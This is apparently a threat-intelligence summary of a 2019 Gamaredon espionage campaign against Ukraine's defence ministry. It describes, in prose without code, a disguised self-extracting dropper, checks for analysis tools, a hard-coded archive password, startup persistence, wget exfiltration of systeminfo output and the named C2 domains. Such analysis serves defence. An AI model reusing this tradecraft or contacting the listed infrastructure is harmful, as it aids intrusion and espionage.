Cyber Incident Victim: Defence ministry and other institutions in Ukraine

The incident involved a cyber espionage campaign targeting Ukrainian military personnel, attributed to the Russian-linked Gamaredon APT group. Attackers distributed a malicious executable disguised as a legitimate RTF document titled "State of the Armed Forces of Ukraine," dated April 2, 2019. The file was a self-extracting archive (SFX) masquerading as Oracle software with an invalid digital signature expiring on March 16, 2019. Upon execution, a batch script checked for security analysis tools like Wireshark and Process Explorer before deploying a decoy document ("Document.docx") to maintain the illusion of legitimacy. The script then extracted a password-protected archive ("26710") using the hard-coded password "dcthfdyjdfcdst,tv," placing "winsetup.exe" in the user profile directory and establishing persistence via a startup folder LNK symlink.

Further analysis revealed the SFX contained a UPX-packed version of the wget utility ("MicrosoftCreate.exe") and a malicious script ("30347.cmd") implementing the Pteranodon implant. The script executed "systeminfo.exe" to gather victim machine data, storing results in "fnQWAZC" and exfiltrating them to the C2 server "librework.ddns.net" using wget. The malware scheduled additional tasks: one task downloaded "setup.exe" from "bitwork.ddns.net," while another placed "ie_cash.exe" (another wget copy) in the Microsoft IE application data folder. A recurring task ran every 32 minutes to execute downloaded payloads. Forensic examination of "librework.ddns.net" revealed multiple samples connecting to the same active C2 infrastructure in early April 2019. The attack exhibited longstanding Gamaredon tradecraft, including reused Pteranodon code patterns consistent with variants observed since the group's emergence in 2013, demonstrating sustained Russian operational interest in Ukrainian military and political entities.